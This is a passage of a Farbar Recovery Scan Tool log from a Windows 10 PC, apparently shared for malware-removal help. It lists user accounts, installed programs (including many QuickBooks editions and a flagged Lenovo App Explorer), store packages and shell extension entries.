000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zkKIqmK.tmp 2022-03-22 18:20 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zmabqBm.tmp 2019-03-04 14:51 - 2019-03-04 14:51 - 000000208 _____ () C:\Users\Karin Hostetler\AppData\Local\oobelibMkey.log 2021-11-14 21:25 - 2021-11-14 21:25 - 000000839 _____ () C:\Users\Karin Hostetler\AppData\Local\recently-used.xbel 2018-07-03 08:29 - 2018-07-03 08:29 - 000000017 _____ () C:\Users\Karin Hostetler\AppData\Local\resmon.resmoncfg ==================== SigCheck ============================ (There is no automatic fix for files that do not pass verification.) ==================== End of FRST.txt ======================== Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-03-2022 Ran by Karin Hostetler (23-03-2022 08:58:09) Running from C:\Users\Karin Hostetler\Desktop\Delete Microsoft Windows 10 Home Version 21H2 19044.1586 (X64) (2020-09-29 13:38:19) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= (If an entry is included in the fixlist, it will be removed.) Administrator (S-1-5-21-1394640484-365018484-2708498470-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-1394640484-365018484-2708498470-503 - Limited - Disabled) defaultuser0 (S-1-5-21-1394640484-365018484-2708498470-1000 - Limited - Disabled) Guest (S-1-5-21-1394640484-365018484-2708498470-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-1394640484-365018484-2708498470-1005 - Limited - Enabled) Karin Hostetler (S-1-5-21-1394640484-365018484-2708498470-1001 - Administrator - Enabled) => C:\Users\Karin Hostetler QBDataServiceUser26 (S-1-5-21-1394640484-365018484-2708498470-1003 - Limited - Enabled) => C:\Users\QBDataServiceUser26 QBDataServiceUser27 (S-1-5-21-1394640484-365018484-2708498470-1002 - Limited - Enabled) => C:\Users\QBDataServiceUser27 QBDataServiceUser28 (S-1-5-21-1394640484-365018484-2708498470-1006 - Limited - Enabled) => C:\Users\QBDataServiceUser28 QBDataServiceUser29 (S-1-5-21-1394640484-365018484-2708498470-1007 - Limited - Enabled) => C:\Users\QBDataServiceUser29 QBDataServiceUser30 (S-1-5-21-1394640484-365018484-2708498470-1008 - Limited - Enabled) => C:\Users\QBDataServiceUser30 QBDataServiceUser31 (S-1-5-21-1394640484-365018484-2708498470-1009 - Limited - Enabled) => C:\Users\QBDataServiceUser31 QBDataServiceUser32 (S-1-5-21-1394640484-365018484-2708498470-1010 - Limited - Enabled) => C:\Users\QBDataServiceUser32 WDAGUtilityAccount (S-1-5-21-1394640484-365018484-2708498470-504 - Limited - Disabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) Adobe Acrobat DC (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-0C0F074E4100}) (Version: 22.001.20085 - Adobe Systems Incorporated) Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 22.001.20085 - Adobe Systems Incorporated) Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 4.8.1.435 - Adobe Systems Incorporated) Adobe Genuine Service (HKLM-x32\...\AdobeGenuineService) (Version: 7.6.0.52 - Adobe Inc.) AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.6 - Advanced Micro Devices, Inc.) ASAP Utilities (HKLM-x32\...\ASAP Utilities_is1) (Version: 7.9.3 - A Must in Every Office BV - Bastien Mensink) Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) BRC IIF Transaction Creator Pro (HKLM-x32\...\IIF Transaction Creator Pro) (Version: 11.47 - Big Red Consulting) Brother MFL-Pro Suite MFC-9130CW (HKLM-x32\...\{E98A9C92-E767-475B-8BC6-8780A86DDC72}) (Version: 1.0.1.0 - Brother Industries, Ltd.) Carbonite (HKLM-x32\...\{6F860AE9-A74E-4D1E-84A0-E2FA01476D77}) (Version: 6.3.8 build 8542 (Jan-21-2021) - Carbonite) Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.) Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.) Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.) Cisco Webex Meetings (HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\ActiveTouchMeetingClient) (Version: 40.8.5 - Cisco Webex LLC) CyberLink PowerDVD 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}) (Version: 14.0.1.6714 - CyberLink Corp.) Data Transfer Utility 11 (HKLM-x32\...\Data Transfer Utility 11) (Version: - ) Driver and Application Installation (HKLM-x32\...\{6EC299C6-074C-4529-8D5F-2798584BB27B}) (Version: 2.12.0219 - Lenovo) DYMO Label v.8 (HKLM-x32\...\DYMO Label v.8) (Version: 8.5.4.1913 - Sanford, L.P.) ExpressVPN (HKLM-x32\...\{b8ff9d27-eab9-4320-ad9b-dba303194cc0}) (Version: 10.2.1.54 - ExpressVPN) ExpressVPN (HKLM-x32\...\{E5B9C3E5-889C-4F22-A959-F4B876ED8867}) (Version: 10.2.1.54 - ExpressVPN) Hidden GIMP 2.10.18 (HKLM\...\GIMP-2_is1) (Version: 2.10.18 - The GIMP Team) GlanceGuest version 4.17.1.19 (HKLM-x32\...\{F5AC5408-CC29-47C0-AD53-1BBBF268B364}_is1) (Version: 4.17.1.19 - Glance Networks, Inc.) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 99.0.4844.82 - Google LLC) GoTo Opener (HKLM-x32\...\{E69269DB-A77B-4BC1-8F39-241107B09F26}) (Version: 1.0.539 - LogMeIn, Inc.) GoToAssist Customer 4.8.0.1702 (HKLM-x32\...\GoToAssist Express Customer) (Version: 4.8.0.1702 - LogMeIn, Inc.) GoToAssist Expert 4.8.0.1702 (HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\GoToAssist Remote Support Expert) (Version: 4.8.0.1702 - LogMeIn, Inc.) Homestead SiteBuilder (HKLM-x32\...\Homestead SiteBuilder) (Version: - Homestead) HP LaserJet Professional P1100-P1560-P1600 Series (HKLM\...\HP LaserJet Professional P1100-P1560-P1600 Series) (Version: - ) HPSSupply (HKLM-x32\...\{7902E313-FF0F-4493-ACB1-A8147B78DCD0}) (Version: 2.1.1.0000 - Hewlett Packard Development Company L.P.) LastPass (uninstall only) (HKLM-x32\...\LastPass) (Version: - LastPass) Lenovo App Explorer (HKU\S-1-5-19\...\Host App Service) (Version: 0.272.1.266 - SweetLabs for Lenovo) <==== ATTENTION Lenovo App Explorer (HKU\S-1-5-20\...\Host App Service) (Version: 0.272.1.266 - SweetLabs for Lenovo) <==== ATTENTION Lenovo App Explorer (HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\Host App Service) (Version: 0.273.4.369 - SweetLabs for Lenovo) <==== ATTENTION Lenovo App Explorer (HKU\S-1-5-21-1394640484-365018484-2708498470-1002\...\Host App Service) (Version: 0.272.1.266 - SweetLabs for Lenovo) <==== ATTENTION Lenovo App Explorer (HKU\S-1-5-21-1394640484-365018484-2708498470-1003\...\Host App Service) (Version: 0.272.1.266 - SweetLabs for Lenovo) <==== ATTENTION Lenovo App Explorer (HKU\S-1-5-21-1394640484-365018484-2708498470-1006\...\Host App Service) (Version: 0.272.1.266 - SweetLabs for Lenovo) <==== ATTENTION Lenovo App Explorer (HKU\S-1-5-21-1394640484-365018484-2708498470-1007\...\Host App Service) (Version: 0.272.1.266 - SweetLabs for Lenovo) <==== ATTENTION Lenovo App Explorer (HKU\S-1-5-21-1394640484-365018484-2708498470-1008\...\Host App Service) (Version: 0.272.1.266 - SweetLabs for Lenovo) <==== ATTENTION Lenovo App Explorer (HKU\S-1-5-21-1394640484-365018484-2708498470-1009\...\Host App Service) (Version: 0.272.1.266 - SweetLabs for Lenovo) <==== ATTENTION Lenovo App Explorer (HKU\S-1-5-21-1394640484-365018484-2708498470-1010\...\Host App Service) (Version: 0.272.1.266 - SweetLabs for Lenovo) <==== ATTENTION Lenovo Blacksilk USB Keyboard Driver (HKLM-x32\...\{B266E062-D6C5-485B-B426-51B152B041A6}) (Version: V1.6.13.0724 - Lenovo) Lenovo Family Cloud Server (HKLM\...\{E3573BD4-2C6B-4436-921C-D15B9278A610}) (Version: 1.2.119.1129 - Lenovo) Hidden Lenovo Family Cloud Server (HKLM-x32\...\InstallShield_{E3573BD4-2C6B-4436-921C-D15B9278A610}) (Version: 1.2.119.1129 - Lenovo) Lenovo Power2Go (HKLM-x32\...\{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.8231 - CyberLink Corp.) Hidden Lenovo Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.8231 - CyberLink Corp.) Lenovo Service Bridge (HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\{2C74547D-EF88-47F4-85F5-BE46A31E26B7}_is1) (Version: 5.0.2.9 - Lenovo) Lenovo Vantage Service (HKLM-x32\...\VantageSRV_is1) (Version: 3.1.76.0 - Lenovo Group Ltd.) LG Mobile Drivers (HKLM-x32\...\{E2C19FF2-BEDB-45B8-87A8-EBF6C0508E3B}) (Version: 4.4.2 - LG Electronics) Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech) Manual (HKLM-x32\...\{693F92E5-37D1-46B7-A0D6-19A74A2FD0EC}) (Version: 1.00.0701 - Lenovo) MB4Outlook (HKLM-x32\...\{72D3240A-7763-41C2-AF67-C6838598B256}_is1) (Version: 1.6 - Innovation Technology Inc.) Microsoft Access database engine 2010 (English) (HKLM\...\{90140000-00D1-0409-1000-0000000FF1CE}) (Version: 14.0.7015.1000 - Microsoft Corporation) Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 99.0.1150.46 - Microsoft Corporation) Microsoft Office 2007 Primary Interop Assemblies (HKLM-x32\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation) Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-0014-0000-0000-0000000FF1CE}_PROR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft) Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation) Microsoft Office Professional 2007 (HKLM-x32\...\PROR) (Version: 12.0.6612.1000 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\OneDriveSetup.exe) (Version: 22.033.0213.0002 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50918.0 - Microsoft Corporation) Microsoft Update Health Tools (HKLM\...\{5016990D-7F61-4A20-9451-A915D6616DD9}) (Version: 3.66.0.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation) Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.29.30133 (HKLM-x32\...\{295d1583-fdb9-414b-a4c8-da539362a26b}) (Version: 14.29.30133.0 - Microsoft Corporation) Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.29.30133 (HKLM-x32\...\{38b2c744-ad08-4d5b-91a2-3fb6f739ff3e}) (Version: 14.29.30133.0 - Microsoft Corporation) Microsoft Visual J# 2.0 Redistributable Package (HKLM-x32\...\Microsoft Visual J# 2.0 Redistributable Package) (Version: - Microsoft Corporation) Microsoft Visual Studio 2005 Tools for Office Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.31007 - Microsoft Corporation) MobiKin Assistant for Android (HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\MobiKin Assistant for Android) (Version: 3.12.16 - MobiKin) MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation) Nuance PaperPort 12 (HKLM-x32\...\{88B5FBDC-967D-4B1F-B291-39284AE12201}) (Version: 12.1.0005 - Nuance Communications, Inc.) Nuance PDF Viewer Plus (HKLM-x32\...\{28656860-4728-433C-8AD4-D1A930437BC8}) (Version: 5.30.3290 - Nuance Communications, Inc) Nuance Power PDF Standard (HKLM\...\{A71E5DA3-8DBF-4033-90A1-26536CEE4805}) (Version: 2.10.6413 - Nuance Communications, Inc.) ODIR (HKLM-x32\...\ODIR_is1) (Version: - Vaita) PaperPort Image Printer 64-bit (HKLM\...\{715CAACC-579B-4831-A5F4-A83A8DE3EFE2}) (Version: 14.00.0000 - Nuance Communications, Inc.) PhotoScape (HKLM-x32\...\PhotoScape) (Version: - ) QBSetup (HKLM-x32\...\{177D00EF-F325-43CB-9036-023A70EEAB61}) (Version: 1.0.0 - Default Company Name) QuickBooks (HKLM\...\{B9BE758E-50B5-4BA7-987B-63184123AA1A}) (Version: 32.0.4001.3201 - Intuit Inc.) Hidden QuickBooks (HKLM-x32\...\{06A9E630-DBA6-4D92-9DE7-A235AA6496C7}) (Version: 20.0.4017.807 - Intuit Inc.) Hidden QuickBooks (HKLM-x32\...\{1F355451-E2A7-470D-953B-F3E9BBCFFFFC}) (Version: 29.0.4011.2901 - Intuit Inc.) Hidden QuickBooks (HKLM-x32\...\{25E202D1-D8E7-46AF-B4B0-157D9993A93E}) (Version: 22.0.4016.2206 - Intuit Inc.) Hidden QuickBooks (HKLM-x32\...\{2B0E1E07-2F3D-4E7D-AD0A-1C74A8881B9B}) (Version: 26.0.4013.2607 - Intuit Inc.) Hidden QuickBooks (HKLM-x32\...\{3167CC62-C775-4E47-92C1-73EBB845751A}) (Version: 23.0.4018.2305 - Intuit Inc.) Hidden QuickBooks (HKLM-x32\...\{3B32E8ED-D3EA-4967-BE1B-35233AA2FDC0}) (Version: 27.0.4009.2702 - Intuit Inc.) Hidden QuickBooks (HKLM-x32\...\{4120AF20-BA58-49D1-8CFA-11F166E73945}) (Version: 29.0.4016.2901 - Intuit Inc.) Hidden QuickBooks (HKLM-x32\...\{422206F8-67E6-45AA-8C2A-C0010789E1F9}) (Version: 28.0.4014.2806 - Intuit Inc.) Hidden QuickBooks (HKLM-x32\...\{48011BF6-E0BC-4B49-9DCA-C7144EF0C01E}) (Version: 28.0.4016.2806 - Intuit Inc.) Hidden QuickBooks (HKLM-x32\...\{4D29DF3C-1A3F-42F7-A565-136F3E5EBD59}) (Version: 31.0.4008.3103 - Intuit Inc.) Hidden QuickBooks (HKLM-x32\...\{604FB1E3-84F2-45E2-AD26-49422B021393}) (Version: 25.0.4014.2506 - Intuit Inc.) Hidden QuickBooks (HKLM-x32\...\{88C0857B-7734-4EA5-A7D9-636DF8622B63}) (Version: 30.0.4013.3000 - Intuit Inc.) Hidden QuickBooks (HKLM-x32\...\{8FAA979A-67A1-4B58-8AA2-A93A13C7FBE2}) (Version: 31.0.4008.3103 - Intuit Inc.) Hidden QuickBooks (HKLM-x32\...\{B52E01F1-D34E-4381-B590-28DFF3C0B647}) (Version: 27.0.4015.2702 - Intuit Inc.) Hidden QuickBooks (HKLM-x32\...\{DF699288-CD8C-49B9-9B26-E75A1896387B}) (Version: 30.0.4013.3000 - Intuit Inc.) Hidden QuickBooks Desktop File Doctor (HKLM-x32\...\{07441683-C1C3-43BC-B3E7-F213B3A69B76}) (Version: 4.6.0.0 - Intuit Inc.) QuickBooks Enterprise Server 22.0 (HKLM\...\{F3EC420A-258F-402C-96AB-F46F199E67D6}) (Version: 32.0.4001.3201 - Intuit Inc.) QuickBooks Enterprise Solutions: Accountant Edition 17.0 (HKLM-x32\...\{F77C660F-612B-4F76-BE68-91D2831BDB77}) (Version: 27.0.4009.2702 - Intuit Inc.) QuickBooks Enterprise Solutions: Accountant Edition 18.0 (HKLM-x32\...\{3EA4FAAD-9EC8-4995-87AA-D1B5C121EF08}) (Version: 28.0.4014.2806 - Intuit Inc.) QuickBooks Enterprise Solutions: Accountant Edition 19.0 (HKLM-x32\...\{A2B33094-0D22-4C72-B587-D0623D338090}) (Version: 29.0.4011.2901 - Intuit Inc.) QuickBooks Enterprise Solutions: Accountant Edition 20.0 (HKLM-x32\...\{26A90241-3077-43DA-9EF4-ABC27710E3C1}) (Version: 30.0.4013.3000 - Intuit Inc.) QuickBooks Enterprise Solutions: Accountant Edition 21.0 (HKLM-x32\...\{02ACBD62-6F07-491C-9C52-AED922199559}) (Version: 31.0.4008.3103 - Intuit Inc.) QuickBooks Premier: Accountant Edition 2010 (HKLM-x32\...\{0700E22B-A423-40A5-BD20-04BF618CA0F9}) (Version: 20.0.4017.807 - Intuit Inc.) QuickBooks Premier: Accountant Edition 2012 (HKLM-x32\...\{2181214D-1954-4C60-91FD-EEA7EBB32022}) (Version: 22.0.4016.2206 - Intuit Inc.) QuickBooks Premier: Accountant Edition 2013 (HKLM-x32\...\{36B3E6E3-D4DE-4B89-A9E6-727715C2A318}) (Version: 23.0.4018.2305 - Intuit Inc.) QuickBooks Premier: Accountant Edition 2015 (HKLM-x32\...\{D58E14D8-963A-4CCD-852E-065655D45004}) (Version: 25.0.4014.2506 - Intuit Inc.) QuickBooks Premier: Accountant Edition 2016 (HKLM-x32\...\{B266F416-6689-47B2-8FEB-98D47E2222BD}) (Version: 26.0.4013.2607 - Intuit Inc.) QuickBooks Premier: Accountant Edition 2017 (HKLM-x32\...\{A68AADD0-24C5-4F55-A955-C1288743B056}) (Version: 27.0.4015.2702 - Intuit Inc.) QuickBooks Premier: Accountant Edition 2018 (HKLM-x32\...\{4EDCB90E-ADBF-4101-A868-24410DD11481}) (Version: 28.0.4016.2806 - Intuit Inc.) QuickBooks Premier: Accountant Edition 2019 (HKLM-x32\...\{47DB717C-260F-4281-95E2-56B8336EB59B}) (Version: 29.0.4016.2901 - Intuit Inc.) QuickBooks Premier: Accountant Edition 2020 (HKLM-x32\...\{5DFD3C5F-49CB-4070-902B-550D15AE304B}) (Version: 30.0.4013.3000 - Intuit Inc.) QuickBooks Premier: Accountant Edition 2021 (HKLM-x32\...\{8E7E43F8-6861-43F2-AF47-2A975F4F1EA5}) (Version: 31.0.4008.3103 - Intuit Inc.) QuickBooks Runtime Redistributable (HKLM\...\{F2A4F809-2DE6-4D27-888B-4D2BB8DAF20E}) (Version: 1.00.0000 - Intuit Inc.) QuickBooks Statement Writer (x64) (HKLM\...\{99B78AE3-9616-470E-B93D-16117A2AFCAE}) (Version: 4.00.0000 - Intuit Inc.) QuickBooks Tool Hub (HKLM-x32\...\{5A43047E-1ACD-4F89-99E6-69988300E6AB}) (Version: 1.0.0.0 - Intuit Inc.) REALTEK Bluetooth Filter Driver (HKLM-x32\...\{9D3D8C60-A5EF-4123-B2B9-172095903AD}) (Version: 1.3.887.041216 - REALTEK Semiconductor Corp.) Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.31213 - Realtek Semiconductor Corp.) Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 10.1.505.2015 - Realtek) REALTEK Wireless LAN Driver (HKLM-x32\...\{9DAABC60-A5EF-41FF-B2B9-17329590CD5}) (Version: 1.00.0286 - REALTEK Semiconductor Corp.) RootsMagic 8.0.0.0 (HKLM-x32\...\{A28324FE-31F8-44BC-83D7-0108E80B6FFB}_is1) (Version: RootsMagic 8.0.0.0 - RootsMagic, Inc.) Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-0014-0000-0000-0000000FF1CE}_PROR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft) Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{32DC821E-4A7D-4878-BEE8-337FA153D7F2}) (Version: 2.63.0.0 - Microsoft Corporation) Hidden VC12X64Redist (HKLM\...\{B573CC21-AE24-4BC5-9B0B-15CF29A3F982}) (Version: 1.00.0000 - Intuit Inc.) VC12X86Redist (HKLM-x32\...\{EA9886ED-21F8-4867-A049-CE6817291EE6}) (Version: 1.00.0000 - Intuit Inc.) Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation) Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation) Vulkan Run Time Libraries 1.0.21.0 (HKLM\...\VulkanRT1.0.21.0) (Version: 1.0.21.0 - LunarG, Inc.) Hidden Vulkan Run Time Libraries 1.0.21.0 (HKLM\...\VulkanRT1.0.21.0-2) (Version: 1.0.21.0 - LunarG, Inc.) WD Drive Utilities (HKLM-x32\...\{2db219ff-e483-403b-9374-aea609abaf1d}) (Version: 1.4.3.13 - Western Digital Technologies, Inc.) Hidden Windows PC Health Check (HKLM\...\{B1E7D0FD-7CFE-4E0C-A5DA-0F676499DB91}) (Version: 3.2.2110.14001 - Microsoft Corporation) Zoom (HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\ZoomUMX) (Version: 4.1 - Zoom Video Communications, Inc.) Packages: ========= Acrobat Notification Client -> C:\Program Files\WindowsApps\AcrobatNotificationClient_1.0.4.0_x86__e1rzdqpraam7r [2019-03-04] (Adobe Systems Incorporated) HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_134.1.221.0_x64__v10z8vjag6ke6 [2022-01-27] (HP Inc.) Lenovo Account Portal -> C:\Program Files\WindowsApps\LenovoCorporation.LenovoID_2.0.37.0_x86__4642shxvsv8s2 [2017-05-08] (LENOVO INCORPORATED.) Lenovo Vantage -> C:\Program Files\WindowsApps\E046963F.LenovoCompanion_10.2202.9.0_x64__k1h2ywk1493x8 [2022-02-24] (LENOVO INC.) Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-13] (Microsoft Corporation) [MS Ad] Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-13] (Microsoft Corporation) [MS Ad] Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2021-02-03] (Microsoft Corporation) ==================== Custom CLSID (Whitelisted): ============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) CustomCLSID: HKU\S-1-5-21-1394640484-365018484-2708498470-1001_Classes\CLSID\{1019ADC7-17CB-4489-AFD5-6642C7400ACE}\localserver32 -> C:\Users\Karin Hostetler\AppData\Local\Webex\Webex\Applications\ptOIEx64.exe (Cisco WebEx LLC -> Cisco WebEx LLC) CustomCLSID: HKU\S-1-5-21-1394640484-365018484-2708498470-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems Incorporated -> Adobe Systems) ShellIconOverlayIdentifiers: [ Carbonite.Green] -> {95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2021-01-21] (Carbonite, Inc. -> Carbonite, Inc.) ShellIconOverlayIdentifiers: [ Carbonite.Partial] -> {E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2021-01-21] (Carbonite, Inc. -> Carbonite, Inc.) ShellIconOverlayIdentifiers: [ Carbonite.Yellow] -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2021-01-21] (Carbonite, Inc. -> Carbonite, Inc.) ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-03-05] (Adobe Systems Incorporated -> ) ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-03-05] (Adobe Systems Incorporated -> ) ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-03-05] (Adobe Systems Incorporated -> ) ShellIconOverlayIdentifiers-x32: [ Carbonite.Green] -> {95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2021-01-21] (Carbonite, Inc. -> Carbonite, Inc.) ShellIconOverlayIdentifiers-x32: [ Carbonite.Partial] -> {E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2021-01-21] (Carbonite, Inc. -> Carbonite, Inc.) ShellIconOverlayIdentifiers-x32: [ 